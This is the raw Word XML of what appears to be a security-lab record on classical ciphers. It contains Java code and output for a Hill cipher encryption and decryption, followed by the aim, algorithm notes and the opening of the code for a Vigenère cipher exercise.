        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>n;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1638CB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="44"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>msg =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>("SecurityLaboratory");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318D9F62" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="hyphen" w:pos="8574"/>
        </w:tabs>
        <w:spacing w:before="48"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("simulation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Hill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Cipher\n</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21285210" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="917" w:right="3449"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("Input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14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msg);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>msg.toUpperCase();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E0F306" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="917"/>
      </w:pP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msg.replaceAll("\\s",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> "");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD80466" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>/*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spaces</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>*/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msg.length()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3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2D8104" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="1198" w:right="4980" w:hanging="281"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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padding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13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*/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(int i = 1; i &lt;= (3 - n); i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BB46A1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:t>msg</w:t>
      </w:r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4"/>
        </w:rPr>
        <w:t>'X';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03914F9B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="51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78A79ADD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50ECFAE8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="240"/>
        <w:ind w:left="917" w:right="4139"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("padded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13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msg);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>char[] pdchars = msg.toCharArray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E628267" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="40"/>
        <w:ind w:left="917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7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>msg.length();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4318762" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>enc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encode(pdchars[i],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>pdchars[i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pdchars[i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4"/>
        </w:rPr>
        <w:t>2]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B236589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27FB15AF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr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7B970A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="71"/>
        <w:ind w:left="917" w:right="4139"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>System.out.println("encoded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13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enc);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>char[] dechars = enc.toCharArray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5E4AE0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
        <w:ind w:left="917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 i &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>enc.length();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>i +=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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26B50F5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>dec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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decode(dechars[i],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>dechars[i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1],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>dechars[i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4"/>
        </w:rPr>
        <w:t>2]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0DC230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1CDF7698" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="202"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43D55FD0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("decoded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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4"/>
        </w:rPr>
        <w:t>dec);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC98A0C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="4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2DC1E63F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2AACA58" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="92"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D214212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2FF09DE9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Simulating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE6B74E" w14:textId="77777777" w:rsidR="00A16F47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303C7DE" wp14:editId="33175974">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>130353</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1836420" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom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6420">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="18361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9662" id="Graphic 153" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:10.25pt;width:144.6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6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kxFQIAAF4EAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFu2zAMvQ/YPwi6r07SLQuMOMXQoMOA&#10;oivQFDsrshwbk0WNVGLn70fJcZJ1t2E+CKT4RD3yUV7e9a0VB4PUgCvk9GYihXEaysbtCvm6efiw&#10;kIKCcqWy4Ewhj4bk3er9u2XnczODGmxpUHASR3nnC1mH4PMsI12bVtENeOM4WAG2KrCLu6xE1XH2&#10;1mazyWSedYClR9CGiHfXQ1CuUv6qMjp8ryoyQdhCMreQVkzrNq7ZaqnyHSpfN/pEQ/0Di1Y1ji89&#10;p1qroMQem79StY1GIKjCjYY2g6pqtEk1cDXTyZtqXmrlTaqFm0P+3Cb6f2n10+HFP2OkTv4R9E/i&#10;jmSdp/wciQ6dMH2FbcQycdGnLh7PXTR9EJo3p4vb+ccZN1tzbDr7nJqcqXw8q/cUvhpIedThkcKg&#10;QTlaqh4t3bvRRFYyamiThkEK1hClYA23g4ZehXgukoum6C5E4l4LB7OBFA1vmDO1S9S6a1QsZTqf&#10;SzFWydgBwUa8hns1GOlqtq+Lsy6xuJ1+WqTZILBN+dBYG2kQ7rb3FsVBxclMXyyEU/wB80hhrage&#10;cHSk6JyA1p2kGtSJOm2hPD6j6HigC0m/9gqNFPab44mJ0z8aOBrb0cBg7yG9kdQjvnXT/1DoRSRQ&#10;yMDiPsE4jyofdYvVn7HxpIMv+wBVE0VNYzQwOjk8xKnE04OLr+TaT6jLb2H1GwAA//8DAFBLAwQU&#10;AAYACAAAACEAEAqKsuAAAAAJAQAADwAAAGRycy9kb3ducmV2LnhtbEyPzU7DMBCE70i8g7VIXFBr&#10;k6aAQpyq4u9QhCiFB3DjJYkar9PYbcLbsz3BcWZHs9/ki9G14oh9aDxpuJ4qEEiltw1VGr4+nyd3&#10;IEI0ZE3rCTX8YIBFcX6Wm8z6gT7wuImV4BIKmdFQx9hlUoayRmfC1HdIfPv2vTORZV9J25uBy10r&#10;E6VupDMN8YfadPhQY7nbHJyGuB+WV+Nqvnt7erf78iXpH9X6VevLi3F5DyLiGP/CcMJndCiYaesP&#10;ZINoWacpb4kaEjUHwYF0NktAbE/GLcgil/8XFL8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+&#10;AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAA&#10;ACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAA&#10;ACEA55Z5MRUCAABeBAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYA&#10;CAAAACEAEAqKsuAAAAAJAQAADwAAAAAAAAAAAAAAAABvBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAA&#10;AAAEAAQA8wAAAHwFAAAAAA==&#10;" path="m,l1836166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A1305FF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="99"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D9FF99" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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SecurityLaboratory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342F6314" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="4139"/>
      </w:pPr>
      <w:r>
        <w:t>Padded Message : SECURITYLABORATORY Encrypted Message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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EACSDKLCAEFQDUKSXU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Decrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F8CF95" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>SECURITYLABORATORY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C404E63" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A0BFBD6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68C932B5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09AB2E29" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07169DA9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="169"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09AB09CE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01A3DA2A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="36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hill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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decryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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output verified successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F524D3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto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926289" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="78"/>
        <w:ind w:left="533" w:right="533"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>26d).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Vigenere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Cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DAE35E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="31"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72514D2C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b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0A8623" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>AIM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C8B33A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="126"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="389068A0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="119"/>
      </w:pP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decryption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vigenere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">substitution </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>technique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170A9094" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/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1" w:space="40"/>
            <w:col w:w="9479"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B593810" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C87D6C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="274" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ALGORITHM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E80A09B" w14:textId="77777777" w:rsidR="00A16F47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6" w:line="232" w:lineRule="auto"/>
        <w:ind w:right="154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Vigenere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cipher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encrypting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>alphabetic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of different Caesar ciphers based on the letters of a keyword.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679E2443" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="5" w:line="320" w:lineRule="exact"/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polyalphabetic</w:t>
      </w:r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substitution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E202E5" w14:textId="77777777" w:rsidR="00A16F47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6" w:line="232" w:lineRule="auto"/>
        <w:ind w:right="1353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encrypt,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alphabets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7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>termed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Vigenere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>square,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Vigenere </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5195DBE3" w14:textId="77777777" w:rsidR="00A16F47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8" w:line="235" w:lineRule="auto"/>
        <w:ind w:right="1316"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>It consists of the alphabet written out 26 times in different rows, each alphabet shifted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cyclically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compared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previous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>alphabet,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26 possible Caesar ciphers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D21855A" w14:textId="77777777" w:rsidR="00A16F47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10" w:line="232" w:lineRule="auto"/>
        <w:ind w:right="1697"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>process,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cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11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alphabet from one of the rows used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A05D17F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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alphabet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point</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>depends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repeating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> keyword.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C42BC19" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4736BF15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A4D64B8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="5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vigenereCipher.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261DA363" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="265"/>
        <w:ind w:left="36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vigenereCipher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A11DDD0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="917" w:right="4139" w:hanging="279"/>
      </w:pPr>
      <w:r>
        <w:t>static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encode(String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>text,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11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key)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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String res = "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A774E06" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">text = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>text.toUpperCase();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF937BC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="917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text.length();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 xml:space="preserve">{ char </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDC155D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198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text.charAt(i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522C8A78" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(c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'Z')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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spacing w:val="-2"/>
        </w:rPr>
        <w:t>continue;</w:t>
      </w:r>
    </w:p>
